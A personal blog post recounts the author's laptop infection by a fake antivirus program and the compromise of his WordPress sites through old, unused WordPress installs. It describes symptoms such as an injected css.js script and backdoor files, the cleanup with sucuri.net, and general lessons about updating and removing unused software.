≡ Menu

This blog got hacked again!

Early last week, one of my Laptops got infected. Someone placed a fake antivirus software and the only option to get rid of the pop-up window was either to visit their site or buy the software.

After checking McAfee Community Forum, I figured out the source of the problems. I then visited this site and followed the great instructions there to clean up this AV Security 2012 virus.

What made me mad was the fact that the Real Time Scanning function of my McAfee Total Protection software had been disabled for no apparent reason, and I could not restart it. This has been going on for a while, and I could not figure out the reasons. However, I believed that turning off the function had allowed this fake antivirus software to get into my Laptop.

The discussions in McAfee Community Forum seemed to blame the registry cleaner software that was installed in my laptop as the culprit. When scanning the system, this registry cleaner software also disabled those McAfee Total Protection functions.

Well, lightning may not strike you twice. However, bad things may hit you in a row.

As soon as I cleaned up my system by removing the virus as well as the registry cleaner software, then removed and reinstalled my McAfee Total Protection to activate its real time scanning function, I got an email from a friend. He said that when he accessed our church’s website that I managed, his virus protection software had to stop and clean a Trojan coming from the website. It infected my microcomputer, he said.

If that was not enough, when I opened this blog the next day, I found this page displayed in my Firefox browser:

Internet Explorer would let you visit the page, but please take the look at Google search result for my blog I found that day by clicking on the figure below. You will see a warning message saying: This site may harm your computer that was listed after the link as shown below:

I have seen this message many times in the past for other websites. At that point I realized, I’d have no time to work on it myself. I then contacted sucuri.net to do the job for me. Unfortunately, as soon as they cleaned up the blog, a few hours later, it got infected again. But that was how we found the culprit. Here is the message I received from sucuri.net.

“While cleaning the site we found an outdated version of WordPress on the server. This is a security risk considering this version has known vulnerabilities. We recommend that you have this updated or removed from the server.”

I then went to all the servers for all my sites and removed every old WordPress software that I had placed in different folders on those servers. In the early days, I had installed the WordPress software in different folders to create a blog for a friend or for other topics, then left those folders there once the project was completed. There was no active site on those folders. Apparently the perpetrator had manipulated the hole in the old version of WordPress to create a gateway for their Malware to get into all my servers.

Google only found and blocked this site, but all my other sites that had some old WordPress versions installed also got infected by the same Malware.

Here are some of the symptoms when the site got infected by this malware that caused Google to block my site:

  • It takes a long time for the site to open. Sometime you may see the message in the display bar at the bottom saying: “waiting for a file from sysformexxxx.co.cc/main.php?page=a911bd6268796cac” The number xxxx may be different from site to site but the rest looks the same.
  • There are some backdoor files installed in the old WordPress folder.
  • If you look at the root directory, you will see a javascript file, css.js with a new timestamp in there
  • If you look at the infected files, particularly your index.htm(l) file, you will see a call to this css.js file right after the body tag

Here is what Google said about the infection. Please click on the picture to see the actual image:

Based on the information from sucuri.net, I then removed all the old WordPress files to close the backdoor on all my other servers, then removed all the malware links and scanned the sites using the Free Scan utilities of sucuri.net.

So far, all the sites seem to work again and Google has also unblocked this site after both sucuri.net and I requested Google separately to unblock the site and a scan using various site advisor scanners didn’t find the threat any more.

Lesson learned:

  • Update your software when the new version comes out, particularly when the new one is updated due to any security threat in the old version.
  • Removed all the unused application softwares, including all the WP Themes that you’re not using anymore.
  • Update your antivirus software and scan your system periodically;
  • Get the help of the expert if it’s needed.

Sucuri.net has a good article on what to do after your site is fixed. In addition, Dre Armeda of sucuri.net has a video presentation on WordPress End-Used Security here. Please check it out!

Happy Thanksgiving!

Disclaimer: Please consult an expert if your site gets infected. This is for your information only.

{ 0 comments… add one }

Leave a Comment